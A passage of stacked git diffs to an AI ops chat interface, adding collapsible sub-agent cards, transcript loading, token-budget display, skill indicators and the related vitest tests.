+            partFor({ ...base, ts: 2000, toolCount: 2, lastTool: 'aws_read' }),
+            partFor({ ...base, ts: 3000, toolCount: 4, lastTool: 'get_aws_credentials' }),
+        ] as any, new Set());
+        expect(state.subagents).toHaveLength(1);
+        expect(state.subagents[0].startedAt).toBe(1000);
+        expect(state.subagents[0].lastTool).toBe('get_aws_credentials');
+        expect(state.subagents[0].toolCount).toBe(4);
+    });
+
+    it('leaves startedAt undefined when no part carried a ts (old streams)', () => {
+        const state = deriveRunState([
+            partFor({ id: 'sa-1', role: 'r', task: 't', status: 'running', toolCount: 0, tokensIn: 0, tokensOut: 0 }),
+        ] as any, new Set());
+        expect(state.subagents[0].startedAt).toBeUndefined();
+    });
+});

--- a/apps/web-ui/components/agent/chat/__tests__/run-state.test.ts
+++ b/apps/web-ui/components/agent/chat/__tests__/run-state.test.ts
@@ -54,6 +54,22 @@ describe('deriveRunState', () => {
         expect(rs.pendingApproval).toBeNull();
     });
 
+    // The heartbeat's keep-alive (buildHeartbeatChunks in app/api/chat/stream-parts.ts)
+    // is a transient part, so it should never land in message.parts at all — but if it
+    // ever does, it must move NOTHING: no UI affordance may light up because the
+    // connection was merely kept open.
+    it('ignores a data-keepalive part entirely — no structured data, no phase, no subagents', () => {
+        const rs = deriveRunState([msg([{ type: 'data-keepalive', data: {} }])] as any, new Set());
+        expect(rs.hasStructuredData).toBe(false);
+        expect(rs.usedSubagents).toBe(false);
+        expect(rs.subagents).toEqual([]);
+        expect(rs.phases).toEqual([]);
+        expect(rs.currentPhase).toBe('text');
+        expect(rs.pendingApproval).toBeNull();
+        expect(rs.pendingClarifications).toEqual([]);
+        expect(rs.tokenUsage).toEqual({ input: 0, output: 0 });
+    });
+
     it('legacy thread (no data parts) → hasStructuredData false, empty plan', () => {
         const rs = deriveRunState([msg([{ type: 'reasoning', text: 'PLANNING_PHASE_START\nsteps…' }])] as any, new Set());
         expect(rs.hasStructuredData).toBe(false);

--- a/apps/web-ui/components/agent/chat/__tests__/subagent-card.test.tsx
+++ b/apps/web-ui/components/agent/chat/__tests__/subagent-card.test.tsx
@@ -1,0 +1,93 @@
+// @vitest-environment jsdom
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
+import { render, screen, waitFor, fireEvent } from '@testing-library/react';
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query';
+
+import { SubagentCard } from '../subagent-card';
+import type { SubagentState } from '../run-state';
+
+const DONE: SubagentState = {
+    id: 'sub-1',
+    role: 'Cost auditor',
+    task: 'Audit lambda config',
+    status: 'done',
+    toolCount: 3,
+    tokensIn: 900,
+    tokensOut: 120,
+    summary: 'Two functions are oversized.',
+};
+
+const RUNS = [{
+    subagentId: 'sub-1',
+    role: 'Cost auditor',
+    task: 'Audit lambda config',
+    status: 'done',
+    toolCount: 3,
+    tokensIn: 900,
+    tokensOut: 120,
+    summary: 'Two functions are oversized.',
+    transcript: [
+        { kind: 'ai', text: 'Listing functions first.' },
+        { kind: 'tool', name: 'aws_read', text: '{"FunctionName":"api-worker"}' },
+    ],
+}];
+
+const fetchMock = vi.fn();
+
+function renderCard(ui: React.ReactElement) {
+    const client = new QueryClient({ defaultOptions: { queries: { retry: false } } });
+    return render(<QueryClientProvider client={client}>{ui}</QueryClientProvider>);
+}
+
+beforeEach(() => {
+    fetchMock.mockReset();
+    fetchMock.mockResolvedValue({ ok: true, json: async () => ({ success: true, data: RUNS }) });
+    vi.stubGlobal('fetch', fetchMock);
+});
+
+afterEach(() => vi.unstubAllGlobals());
+
+describe('SubagentCard transcript loading', () => {
+    it('does no network work until the card is expanded', () => {
+        renderCard(<SubagentCard subagent={DONE} threadId="thread-1" />);
+        expect(fetchMock).not.toHaveBeenCalled();
+    });
+
+    it('fetches the thread\'s persisted runs on expand and renders this sub-agent\'s transcript', async () => {
+        renderCard(<SubagentCard subagent={DONE} threadId="thread-1" />);
+
+        fireEvent.click(screen.getByRole('button'));
+
+        await waitFor(() => expect(fetchMock).toHaveBeenCalledWith('/api/chat/subagents/thread-1'));
+        expect(await screen.findByText('Listing functions first.')).toBeTruthy();
+        expect(screen.getByText('{"FunctionName":"api-worker"}')).toBeTruthy();
+        expect(screen.getByText('Transcript')).toBeTruthy();
+    });
+
+    it('still shows task and findings when no threadId is available, without fetching', async () => {
+        renderCard(<SubagentCard subagent={DONE} />);
+
+        fireEvent.click(screen.getByRole('button'));
+
+        expect(await screen.findByText('Two functions are oversized.')).toBeTruthy();
+        expect(fetchMock).not.toHaveBeenCalled();
+    });
+
+    it('renders task and findings even when the transcript request fails', async () => {
+        fetchMock.mockResolvedValue({ ok: false, json: async () => ({ success: false, error: 'db down' }) });
+        renderCard(<SubagentCard subagent={DONE} threadId="thread-1" />);
+
+        fireEvent.click(screen.getByRole('button'));
+
+        expect(await screen.findByText('Two functions are oversized.')).toBeTruthy();
+        await waitFor(() => expect(fetchMock).toHaveBeenCalled());
+        expect(screen.queryByText('Transcript')).toBeNull();
+    });
+
+    it('cannot be expanded while the sub-agent is still running', async () => {
+        renderCard(<SubagentCard subagent={{ ...DONE, status: 'running', summary: undefined }} threadId="thread-1" />);
+
+        expect(screen.getByRole('button')).toHaveProperty('disabled', true);
+        expect(fetchMock).not.toHaveBeenCalled();
+    });
+});

--- a/apps/web-ui/components/agent/chat/run-rail.tsx
+++ b/apps/web-ui/components/agent/chat/run-rail.tsx
@@ -7,7 +7,12 @@ import { Plan, PlanContent, PlanStep } from "@/components/ai-elements/plan";
 import { Spinner } from "@/components/ui/spinner";
 import { SubagentCard } from "./subagent-card";
 import { useSubagentRuns } from "@/lib/queries/subagents";
+import { useAiopsSubagentSettings } from "@/lib/queries/aiops-settings";
 import type { RunState, SubagentState } from "./run-state";
+
+function formatTokensCompact(n: number): string {
+  return n >= 1000 ? `${Math.round(n / 1000)}k` : String(n);
+}
 
 const PHASE_LABELS: Record<string, string> = {
   planning: "Planning", execution: "Executing", reflection: "Reflecting",
@@ -60,23 +65,59 @@ export function RunRail({
   const { plan, currentPhase, pendingApproval, pendingClarifications } = runState;
 
   // A reloaded thread has no data-subagent parts (they are not persisted), so the
-  // cards are rebuilt from agent_subagent_runs. Only fetched when the thread is
-  // known to have fanned out — a persisted dispatch_agent tool call — and only when
-  // there is no live state to prefer.
-  const needsPersistedSubagents = runState.usedSubagents && runState.subagents.length === 0;
+  // cards are rebuilt from agent_subagent_runs. Fetched in two cases:
+  //  - reload: the thread fanned out (persisted dispatch_agent call) but there is
+  //    no live card state at all;
+  //  - stream death: the stream ended while a card still says "running". The
+  //    terminal event was persisted by the server but never reached this client,
+  //    so without reconciliation the spinner spins forever on a dead run.
+  const hasStaleRunning = !isStreaming && runState.subagents.some((s) => s.status === "running");
+  const needsPersistedSubagents = runState.usedSubagents && (runState.subagents.length === 0 || hasStaleRunning);
   const { data: persistedRuns } = useSubagentRuns(threadId, needsPersistedSubagents);
-  const subagents: SubagentState[] = needsPersistedSubagents
-    ? (persistedRuns ?? []).map((run) => ({
-        id: run.subagentId,
-        role: run.role,
-        task: run.task,
-        status: run.status === "done" || run.status === "failed" ? run.status : "running",
-        toolCount: run.toolCount,
-        tokensIn: run.tokensIn,
-        tokensOut: run.tokensOut,
-        ...(run.summary ? { summary: run.summary } : {}),
-      }))
-    : runState.subagents;
+
+  let subagents: SubagentState[];
+  if (runState.subagents.length === 0) {
+    subagents = needsPersistedSubagents
+      ? (persistedRuns ?? []).map((run) => ({
+          id: run.subagentId,
+          role: run.role,
+          task: run.task,
+          status: run.status === "done" || run.status === "failed" ? run.status : "running",
+          toolCount: run.toolCount,
+          tokensIn: run.tokensIn,
+          tokensOut: run.tokensOut,
+          ...(run.summary ? { summary: run.summary } : {}),
+        }))
+      : runState.subagents;
+  } else if (hasStaleRunning && persistedRuns) {
+    // Merge: a persisted TERMINAL status wins over a live "running" card; a card
+    // the store still calls running stays as-is (the store row may simply lag).
+    const byId = new Map(persistedRuns.map((r) => [r.subagentId, r]));
+    subagents = runState.subagents.map((live) => {
+      if (live.status !== "running") return live;
+      const stored = byId.get(live.id);
+      if (!stored || (stored.status !== "done" && stored.status !== "failed")) return live;
+      return {
+        ...live,
+        status: stored.status,
+        toolCount: stored.toolCount,
+        tokensIn: stored.tokensIn,
+        tokensOut: stored.tokensOut,
+        ...(stored.summary ? { summary: stored.summary } : {}),
+      };
+    });
+  } else {
+    subagents = runState.subagents;
+  }
+
+  // Budget context for the section header ("109k/400k tokens") and the
+  // enabled-but-idle signal in Context. Only fetched once the rail exists;
+  // failures degrade to plain counters.
+  const { data: aiopsSettings } = useAiopsSubagentSettings();
+  const subagentBudget = aiopsSettings?.budget;
+  const subagentTokensUsed = subagents.reduce((sum, s) => sum + s.tokensIn + s.tokensOut, 0);
+  const subagentTokenBudget = subagentBudget?.enabled ? subagentBudget.maxSubagentTokensPerRun : null;
+  const subagentsEnabled = (aiopsSettings?.platformEnabled ?? false) && (subagentBudget?.enabled ?? false);
   const done = plan.filter((s) => s.status === "completed").length;
   const mutativePending = pendingApproval?.tools.some((t) => t.guard?.isMutative) ?? false;
 
@@ -173,7 +214,7 @@ export function RunRail({
       {subagents.length > 0 && (
         <RailSection
           icon={Bot}
-          title={`Sub-agents (${subagents.filter((s) => s.status === "running").length} running)`}
+          title={`Sub-agents (${subagents.filter((s) => s.status === "running").length} running · ${formatTokensCompact(subagentTokensUsed)}${subagentTokenBudget ? `/${formatTokensCompact(subagentTokenBudget)}` : ""} tokens)`}
         >
           <div className="space-y-1.5">
             {subagents.map((subagent) => (
@@ -227,7 +268,25 @@ export function RunRail({
             <Cpu className="mt-0.5 h-3 w-3 shrink-0" />
             <span className="min-w-0 break-words">{context.modelLabel || "Default model"}</span>
           </li>
-          {context.skillName && <li className="break-words">Skill: {context.skillName}</li>}
+          {context.skillName ? (
+            <li className="break-words">Skill: {context.skillName}</li>
+          ) : runState.activeSkill ? (
+            // Triage auto-selected this skill — without this line a loaded
+            // skill is indistinguishable from no skill at all.
+            <li className="break-words" data-testid="active-skill-line">
+              Skill: {runState.activeSkill.slug}{runState.activeSkill.source === 'auto' ? ' (auto)' : ''}
+            </li>
+          ) : null}
+          {/* Distinguishes "enabled but the model chose not to delegate" from
+              "feature off" — without this the two states are identical in the UI. */}
+          {subagentBudget && (
+            <li className="flex items-center gap-1.5" data-testid="subagents-context-line">
+              <Bot className="h-3 w-3 shrink-0" />
+              {subagentsEnabled
+                ? `Sub-agents: on (max ${subagentBudget.maxConcurrentSubagents} parallel)`
+                : "Sub-agents: off"}
+            </li>
+          )}
           <li className="break-words">{context.kbLabel}{context.toolCount != null ? ` · ${context.toolCount} tools` : ""}</li>
         </ul>
       </RailSection>

--- a/apps/web-ui/components/agent/chat/run-rail.tsx
+++ b/apps/web-ui/components/agent/chat/run-rail.tsx
@@ -6,7 +6,8 @@ import { Activity, AlertTriangle, Bot, ChevronsDownUp, ChevronsUpDown, Cloud, Cp
 import { Plan, PlanContent, PlanStep } from "@/components/ai-elements/plan";
 import { Spinner } from "@/components/ui/spinner";
 import { SubagentCard } from "./subagent-card";
-import type { RunState } from "./run-state";
+import { useSubagentRuns } from "@/lib/queries/subagents";
+import type { RunState, SubagentState } from "./run-state";
 
 const PHASE_LABELS: Record<string, string> = {
   planning: "Planning", execution: "Executing", reflection: "Reflecting",
@@ -57,6 +58,25 @@ export function RunRail({
   threadId?: string;
 }) {
   const { plan, currentPhase, pendingApproval, pendingClarifications } = runState;
+
+  // A reloaded thread has no data-subagent parts (they are not persisted), so the
+  // cards are rebuilt from agent_subagent_runs. Only fetched when the thread is
+  // known to have fanned out — a persisted dispatch_agent tool call — and only when
+  // there is no live state to prefer.
+  const needsPersistedSubagents = runState.usedSubagents && runState.subagents.length === 0;
+  const { data: persistedRuns } = useSubagentRuns(threadId, needsPersistedSubagents);
+  const subagents: SubagentState[] = needsPersistedSubagents
+    ? (persistedRuns ?? []).map((run) => ({
+        id: run.subagentId,
+        role: run.role,
+        task: run.task,
+        status: run.status === "done" || run.status === "failed" ? run.status : "running",
+        toolCount: run.toolCount,
+        tokensIn: run.tokensIn,
+        tokensOut: run.tokensOut,
+        ...(run.summary ? { summary: run.summary } : {}),
+      }))
+    : runState.subagents;
   const done = plan.filter((s) => s.status === "completed").length;
   const mutativePending = pendingApproval?.tools.some((t) => t.guard?.isMutative) ?? false;
 
@@ -150,13 +170,13 @@ export function RunRail({
 
       {/* Dispatched sub-agents — collapsed cards so their prose never lands in
           the transcript; each one expands to its own task + findings. */}
-      {runState.subagents.length > 0 && (
+      {subagents.length > 0 && (
         <RailSection
           icon={Bot}
-          title={`Sub-agents (${runState.subagents.filter((s) => s.status === "running").length} running)`}
+          title={`Sub-agents (${subagents.filter((s) => s.status === "running").length} running)`}
         >
           <div className="space-y-1.5">
-            {runState.subagents.map((subagent) => (
+            {subagents.map((subagent) => (
               <SubagentCard key={subagent.id} subagent={subagent} threadId={threadId} />
             ))}
           </div>

--- a/apps/web-ui/components/agent/chat/run-rail.tsx
+++ b/apps/web-ui/components/agent/chat/run-rail.tsx
@@ -2,9 +2,10 @@
 
 import { useState } from "react";
 import { cn } from "@/lib/utils";
-import { Activity, AlertTriangle, ChevronsDownUp, ChevronsUpDown, Cloud, Cpu, HelpCircle, ListChecks, ShieldCheck, Sparkles } from "lucide-react";
+import { Activity, AlertTriangle, Bot, ChevronsDownUp, ChevronsUpDown, Cloud, Cpu, HelpCircle, ListChecks, ShieldCheck, Sparkles } from "lucide-react";
 import { Plan, PlanContent, PlanStep } from "@/components/ai-elements/plan";
 import { Spinner } from "@/components/ui/spinner";
+import { SubagentCard } from "./subagent-card";
 import type { RunState } from "./run-state";
 
 const PHASE_LABELS: Record<string, string> = {
@@ -46,10 +47,14 @@ export function RunRail({
   runState,
   isStreaming,
   context,
+  threadId,
 }: {
   runState: RunState;
   isStreaming: boolean;
   context: { accountNames: string[]; modelLabel: string; skillName: string | null; toolCount: number | null; kbLabel: string };
+  /** Needed to fetch a persisted sub-agent transcript when a card is expanded
+   *  after a reload. Optional so the existing rail tests keep compiling. */
+  threadId?: string;
 }) {
   const { plan, currentPhase, pendingApproval, pendingClarifications } = runState;
   const done = plan.filter((s) => s.status === "completed").length;
@@ -140,6 +145,21 @@ export function RunRail({
               })}
             </PlanContent>
           </Plan>
+        </RailSection>
+      )}
+
+      {/* Dispatched sub-agents — collapsed cards so their prose never lands in
+          the transcript; each one expands to its own task + findings. */}
+      {runState.subagents.length > 0 && (
+        <RailSection
+          icon={Bot}
+          title={`Sub-agents (${runState.subagents.filter((s) => s.status === "running").length} running)`}
+        >
+          <div className="space-y-1.5">
+            {runState.subagents.map((subagent) => (
+              <SubagentCard key={subagent.id} subagent={subagent} threadId={threadId} />
+            ))}
+          </div>
         </RailSection>
       )}
 

--- a/apps/web-ui/components/agent/chat/run-state.ts
+++ b/apps/web-ui/components/agent/chat/run-state.ts
@@ -40,6 +40,11 @@ export interface RunState {
     /** Sub-agents dispatched in this thread, in first-seen order. Later parts for
      *  the same id replace the earlier entry in place. */
     subagents: SubagentState[];
+    /** True when this thread fanned out at all — set by a live data-subagent part
+     *  OR by a persisted dispatch_agent tool call. data-subagent parts are not
+     *  persisted, so after a reload this is the ONLY signal that the rail should
+     *  rebuild the cards from agent_subagent_runs rather than render nothing. */
+    usedSubagents: boolean;
 }
 
 interface LoosePart { type: string; data?: any; text?: string }
@@ -59,6 +64,7 @@ export function deriveRunState(
     let tokenIn = 0;
     let tokenOut = 0;
     const subagents = new Map<string, SubagentState>();
+    let usedSubagents = false;
     // Tool calls with an output-bearing tool part ANYWHERE in the thread. An
     // executed / rejected / answered tool can never be pending again, no matter
     // what a stale data-approval or data-clarification part claims (defense
@@ -77,6 +83,11 @@ export function deriveRunState(
                     p.state === 'output-available' ||
                     p.state === 'output-error';
                 if (hasOutput) executedIds.add(String(p.toolCallId));
+                // `tool-invocation` + toolName is the reloaded history shape;
+                // `tool-dispatch_agent` is the streamed typed-part shape.
+                if (p.toolName === 'dispatch_agent' || p.type === 'tool-dispatch_agent') {
+                    usedSubagents = true;
+                }
             }
             switch (part.type) {
                 case 'data-plan': {
@@ -118,6 +129,7 @@ export function deriveRunState(
                 }
                 case 'data-subagent': {
                     hasStructuredData = true;
+                    usedSubagents = true;
                     const id = String(part.data?.id ?? '');
                     if (!id) break;
                     // Map.set on an existing key preserves insertion order, so the
@@ -157,6 +169,7 @@ export function deriveRunState(
         hasApprovalData,
         tokenUsage: { input: tokenIn, output: tokenOut },
         subagents: Array.from(subagents.values()),
+        usedSubagents,
     };
 }
 

--- a/apps/web-ui/components/agent/chat/run-state.ts
+++ b/apps/web-ui/components/agent/chat/run-state.ts
@@ -13,6 +13,17 @@ export interface PendingApprovalTool {
 }
 export interface PendingClarification { toolCallId: string; question: string; options: string[] }
 
+export interface SubagentState {
+    id: string;
+    role: string;
+    task: string;
+    status: 'running' | 'done' | 'failed';
+    toolCount: number;
+    tokensIn: number;
+    tokensOut: number;
+    summary?: string;
+}
+
 export interface RunState {
     plan: RunPlanStep[];
     planUpdatedBy: string | null;
@@ -26,6 +37,9 @@ export interface RunState {
     hasApprovalData: boolean;
     /** Cumulative billed token totals summed from every data-usage part in the thread. */
     tokenUsage: { input: number; output: number };
+    /** Sub-agents dispatched in this thread, in first-seen order. Later parts for
+     *  the same id replace the earlier entry in place. */
+    subagents: SubagentState[];
 }
 
 interface LoosePart { type: string; data?: any; text?: string }
@@ -44,6 +58,7 @@ export function deriveRunState(
     let hasApprovalData = false;
     let tokenIn = 0;
     let tokenOut = 0;
+    const subagents = new Map<string, SubagentState>();
     // Tool calls with an output-bearing tool part ANYWHERE in the thread. An
     // executed / rejected / answered tool can never be pending again, no matter
     // what a stale data-approval or data-clarification part claims (defense
@@ -101,6 +116,25 @@ export function deriveRunState(
                     tokenOut += Number(part.data?.output) || 0;
                     break;
                 }
+                case 'data-subagent': {
+                    hasStructuredData = true;
+                    const id = String(part.data?.id ?? '');
+                    if (!id) break;
+                    // Map.set on an existing key preserves insertion order, so the
+                    // card stays put as it updates from running → done.
+                    subagents.set(id, {
+                        id,
+                        role: String(part.data?.role ?? ''),
+                        task: String(part.data?.task ?? ''),
+                        status: (part.data?.status === 'done' || part.data?.status === 'failed')
+                            ? part.data.status : 'running',
+                        toolCount: Number(part.data?.toolCount) || 0,
+                        tokensIn: Number(part.data?.tokensIn) || 0,
+                        tokensOut: Number(part.data?.tokensOut) || 0,
+                        ...(part.data?.summary ? { summary: String(part.data.summary) } : {}),
+                    });
+                    break;
+                }
             }
         }
     }
@@ -122,6 +156,7 @@ export function deriveRunState(
         hasStructuredData,
         hasApprovalData,
         tokenUsage: { input: tokenIn, output: tokenOut },
+        subagents: Array.from(subagents.values()),
     };
 }
 

--- a/apps/web-ui/components/agent/chat/run-state.ts
+++ b/apps/web-ui/components/agent/chat/run-state.ts
@@ -21,6 +21,10 @@ export interface SubagentState {
     toolCount: number;
     tokensIn: number;
     tokensOut: number;
+    /** Tool (batch) currently executing — shown as the card's live action line. */
+    lastTool?: string;
+    /** Server ts of the FIRST part seen for this sub-agent; drives the elapsed timer. */
+    startedAt?: number;
     summary?: string;
 }
 
@@ -40,6 +44,8 @@ export interface RunState {
     /** Sub-agents dispatched in this thread, in first-seen order. Later parts for
      *  the same id replace the earlier entry in place. */
     subagents: SubagentState[];
+    /** Skill active for the latest run — user-pinned or triage auto-selected. */
+    activeSkill?: { slug: string; source: 'user' | 'auto' } | null;
     /** True when this thread fanned out at all — set by a live data-subagent part
      *  OR by a persisted dispatch_agent tool call. data-subagent parts are not
      *  persisted, so after a reload this is the ONLY signal that the rail should
@@ -65,6 +71,7 @@ export function deriveRunState(
     let tokenOut = 0;
     const subagents = new Map<string, SubagentState>();
     let usedSubagents = false;
+    let activeSkill: { slug: string; source: 'user' | 'auto' } | null = null;
     // Tool calls with an output-bearing tool part ANYWHERE in the thread. An
     // executed / rejected / answered tool can never be pending again, no matter
     // what a stale data-approval or data-clarification part claims (defense
@@ -122,6 +129,12 @@ export function deriveRunState(
                     }
                     break;
                 }
+                case 'data-skill': {
+                    if (part.data?.slug) {
+                        activeSkill = { slug: String(part.data.slug), source: part.data.source === 'user' ? 'user' : 'auto' };
+                    }
+                    break;
+                }
                 case 'data-usage': {
                     tokenIn += Number(part.data?.input) || 0;
                     tokenOut += Number(part.data?.output) || 0;
@@ -133,7 +146,11 @@ export function deriveRunState(
                     const id = String(part.data?.id ?? '');
                     if (!id) break;
                     // Map.set on an existing key preserves insertion order, so the
-                    // card stays put as it updates from running → done.
+                    // card stays put as it updates from running → done. startedAt is
+                    // sticky: the first part's ts survives every later update, so the
+                    // elapsed timer never restarts mid-run.
+                    const prior = subagents.get(id);
+                    const ts = Number(part.data?.ts) || undefined;
                     subagents.set(id, {
                         id,
                         role: String(part.data?.role ?? ''),
@@ -143,6 +160,8 @@ export function deriveRunState(
                         toolCount: Number(part.data?.toolCount) || 0,
                         tokensIn: Number(part.data?.tokensIn) || 0,
                         tokensOut: Number(part.data?.tokensOut) || 0,
+                        ...(part.data?.lastTool ? { lastTool: String(part.data.lastTool) } : {}),
+                        ...(prior?.startedAt ?? ts ? { startedAt: prior?.startedAt ?? ts } : {}),
                         ...(part.data?.summary ? { summary: String(part.data.summary) } : {}),
                     });
                     break;
@@ -170,6 +189,7 @@ export function deriveRunState(
         tokenUsage: { input: tokenIn, output: tokenOut },
         subagents: Array.from(subagents.values()),
         usedSubagents,
+        activeSkill,
     };
 }
 

--- a/apps/web-ui/components/agent/chat/subagent-card.tsx
+++ b/apps/web-ui/components/agent/chat/subagent-card.tsx
@@ -4,6 +4,7 @@ import { useState } from 'react';
 import { Bot, CheckCircle2, ChevronDown, ChevronRight, Loader2, XCircle } from 'lucide-react';
 
 import { cn } from '@/lib/utils';
+import { useSubagentRuns } from '@/lib/queries/subagents';
 import type { SubagentState } from './run-state';
 
 function formatTokens(n: number): string {
@@ -21,13 +22,19 @@ export function SubagentCard({
   threadId,
 }: {
   subagent: SubagentState;
-  /** Reserved for fetching a persisted sub-agent transcript when a card is
-   *  expanded after a reload — not used yet; the findings panel below reads
-   *  purely from the live `subagent.summary`. */
+  /** Thread whose persisted sub-agent runs hold the transcript. Optional: without
+   *  it the card still renders the live task + findings, just no transcript. */
   threadId?: string;
 }) {
   const [expanded, setExpanded] = useState(false);
   const canExpand = subagent.status !== 'running' && !!subagent.summary;
+
+  // Loaded only on expand — the transcript is never streamed (three interleaved
+  // sub-agent narrations are unreadable) and never persisted in the message
+  // history, so it comes from agent_subagent_runs on demand. Keyed per thread, so
+  // expanding a second card in the same thread is served from cache.
+  const { data: runs } = useSubagentRuns(threadId, expanded);
+  const transcript = runs?.find(r => r.subagentId === subagent.id)?.transcript ?? [];
 
   return (
     <div className="rounded-md border bg-muted/30 text-sm">
@@ -60,6 +67,22 @@ export function SubagentCard({
           <p className="mb-3 whitespace-pre-wrap text-xs text-muted-foreground">{subagent.task}</p>
           <p className="mb-1 text-xs font-medium text-muted-foreground">Findings</p>
           <p className="whitespace-pre-wrap text-xs">{subagent.summary}</p>
+
+          {transcript.length > 0 && (
+            <div className="mt-3 border-t pt-2">
+              <p className="mb-1 text-xs font-medium text-muted-foreground">Transcript</p>
+              <div className="space-y-1.5">
+                {transcript.map((entry, i) => (
+                  <div key={i} className="text-xs">
+                    <span className="text-muted-foreground">
+                      {entry.kind === 'tool' ? `${entry.name ?? 'tool'} → ` : 'thinking: '}
+                    </span>
+                    <span className="whitespace-pre-wrap">{entry.text}</span>
+                  </div>
+                ))}
+              </div>
+            </div>
+          )}
         </div>
       )}
     </div>

--- a/apps/web-ui/components/agent/chat/subagent-card.tsx
+++ b/apps/web-ui/components/agent/chat/subagent-card.tsx
@@ -1,0 +1,67 @@
+'use client';
+
+import { useState } from 'react';
+import { Bot, CheckCircle2, ChevronDown, ChevronRight, Loader2, XCircle } from 'lucide-react';
+
+import { cn } from '@/lib/utils';
+import type { SubagentState } from './run-state';
+
+function formatTokens(n: number): string {
+  return n >= 1000 ? `${(n / 1000).toFixed(1)}k` : String(n);
+}
+
+const STATUS_ICON = {
+  running: <Loader2 className="h-3.5 w-3.5 animate-spin text-muted-foreground" />,
+  done: <CheckCircle2 className="h-3.5 w-3.5 text-green-500" />,
+  failed: <XCircle className="h-3.5 w-3.5 text-destructive" />,
+} as const;
+
+export function SubagentCard({
+  subagent,
+  threadId,
+}: {
+  subagent: SubagentState;
+  /** Reserved for fetching a persisted sub-agent transcript when a card is
+   *  expanded after a reload — not used yet; the findings panel below reads
+   *  purely from the live `subagent.summary`. */
+  threadId?: string;
+}) {
+  const [expanded, setExpanded] = useState(false);
+  const canExpand = subagent.status !== 'running' && !!subagent.summary;
+
+  return (
+    <div className="rounded-md border bg-muted/30 text-sm">
+      <button
+        type="button"
+        className={cn(
+          'flex w-full items-center gap-2 px-3 py-2 text-left',
+          canExpand ? 'cursor-pointer hover:bg-muted/50' : 'cursor-default',
+        )}
+        onClick={() => canExpand && setExpanded(v => !v)}
+        aria-expanded={canExpand ? expanded : undefined}
+        disabled={!canExpand}
+      >
+        {canExpand
+          ? (expanded ? <ChevronDown className="h-3.5 w-3.5 shrink-0" /> : <ChevronRight className="h-3.5 w-3.5 shrink-0" />)
+          : <Bot className="h-3.5 w-3.5 shrink-0 text-muted-foreground" />}
+
+        {STATUS_ICON[subagent.status]}
+
+        <span className="flex-1 truncate font-medium">{subagent.role}</span>
+
+        <span className="shrink-0 text-xs tabular-nums text-muted-foreground">
+          {subagent.toolCount} tools · {formatTokens(subagent.tokensIn + subagent.tokensOut)} tokens
+        </span>
+      </button>
+
+      {expanded && subagent.summary && (
+        <div className="border-t px-3 py-2">
+          <p className="mb-1 text-xs font-medium text-muted-foreground">Task</p>
+          <p className="mb-3 whitespace-pre-wrap text-xs text-muted-foreground">{subagent.task}</p>
+          <p className="mb-1 text-xs font-medium text-muted-foreground">Findings</p>
+          <p className="whitespace-pre-wrap text-xs">{subagent.summary}</p>
+        </div>
+      )}
+    </div>
+  );
+}

--- a/apps/web-ui/components/agent/chat/subagent-card.tsx
+++ b/apps/web-ui/components/agent/chat/subagent-card.tsx
@@ -1,6 +1,6 @@
 'use client';
 
-import { useState } from 'react';
+import { useEffect, useState } from 'react';
 import { Bot, CheckCircle2, ChevronDown, ChevronRight, Loader2, XCircle } from 'lucide-react';
 
 import { cn } from '@/lib/utils';
@@ -11,11 +11,32 @@ function formatTokens(n: number): string {
   return n >= 1000 ? `${(n / 1000).toFixed(1)}k` : String(n);
 }
 
+function formatElapsed(ms: number): string {
+  const s = Math.max(0, Math.floor(ms / 1000));
+  return s >= 60 ? `${Math.floor(s / 60)}m ${s % 60}s` : `${s}s`;
+}
+
+/** An abort surfaced as a failure — the run was stopped; the sub-agent did nothing wrong. */
+function isAbortSummary(summary: string | undefined): boolean {
+  return !!summary && /abort/i.test(summary);
+}
+
 const STATUS_ICON = {
   running: <Loader2 className="h-3.5 w-3.5 animate-spin text-muted-foreground" />,
   done: <CheckCircle2 className="h-3.5 w-3.5 text-green-500" />,
   failed: <XCircle className="h-3.5 w-3.5 text-destructive" />,
 } as const;
+
+/** Ticks once a second while `active`, so the elapsed label counts up live. */
+function useNowWhile(active: boolean): number {
+  const [now, setNow] = useState(() => Date.now());
+  useEffect(() => {
+    if (!active) return;
+    const interval = setInterval(() => setNow(Date.now()), 1000);
+    return () => clearInterval(interval);
+  }, [active]);
+  return now;
+}
 
 export function SubagentCard({
   subagent,
@@ -27,7 +48,10 @@ export function SubagentCard({
   threadId?: string;
 }) {
   const [expanded, setExpanded] = useState(false);
-  const canExpand = subagent.status !== 'running' && !!subagent.summary;
+  const isRunning = subagent.status === 'running';
+  const canExpand = !isRunning && !!subagent.summary;
+  const now = useNowWhile(isRunning && !!subagent.startedAt);
+  const cancelled = subagent.status === 'failed' && isAbortSummary(subagent.summary);
 
   // Loaded only on expand — the transcript is never streamed (three interleaved
   // sub-agent narrations are unreadable) and never persisted in the message
@@ -54,19 +78,46 @@ export function SubagentCard({
 
         {STATUS_ICON[subagent.status]}
 
-        <span className="flex-1 truncate font-medium">{subagent.role}</span>
+        <span className="min-w-0 flex-1">
+          <span className="block truncate font-medium" title={subagent.role}>{subagent.role}</span>
+          {/* Task excerpt — disambiguates cards whose role strings collide. */}
+          <span className="block truncate text-xs text-muted-foreground" title={subagent.task}>
+            {subagent.task}
+          </span>
+        </span>
 
         <span className="shrink-0 text-xs tabular-nums text-muted-foreground">
           {subagent.toolCount} tools · {formatTokens(subagent.tokensIn + subagent.tokensOut)} tokens
+          {isRunning && subagent.startedAt ? ` · ${formatElapsed(now - subagent.startedAt)}` : ''}
         </span>
       </button>
+
+      {/* Live action line — what makes the spinner trustworthy. */}
+      {isRunning && subagent.lastTool && (
+        <div
+          className="truncate border-t px-3 py-1 text-xs text-muted-foreground"
+          data-testid="subagent-current-tool"
+        >
+          › {subagent.lastTool}
+        </div>
+      )}
+
+      {cancelled && !expanded && (
+        <div className="border-t px-3 py-1 text-xs text-muted-foreground">
+          Cancelled — the run was stopped before this sub-agent finished.
+        </div>
+      )}
 
       {expanded && subagent.summary && (
         <div className="border-t px-3 py-2">
           <p className="mb-1 text-xs font-medium text-muted-foreground">Task</p>
           <p className="mb-3 whitespace-pre-wrap text-xs text-muted-foreground">{subagent.task}</p>
           <p className="mb-1 text-xs font-medium text-muted-foreground">Findings</p>
-          <p className="whitespace-pre-wrap text-xs">{subagent.summary}</p>
+          <p className="whitespace-pre-wrap text-xs">
+            {cancelled
+              ? 'Cancelled — the run was stopped before this sub-agent finished.'
+              : subagent.summary}
+          </p>
 
           {transcript.length > 0 && (
             <div className="mt-3 border-t pt-2">

--- a/apps/web-ui/components/agent/workspace/__tests__/agent-turn.test.tsx
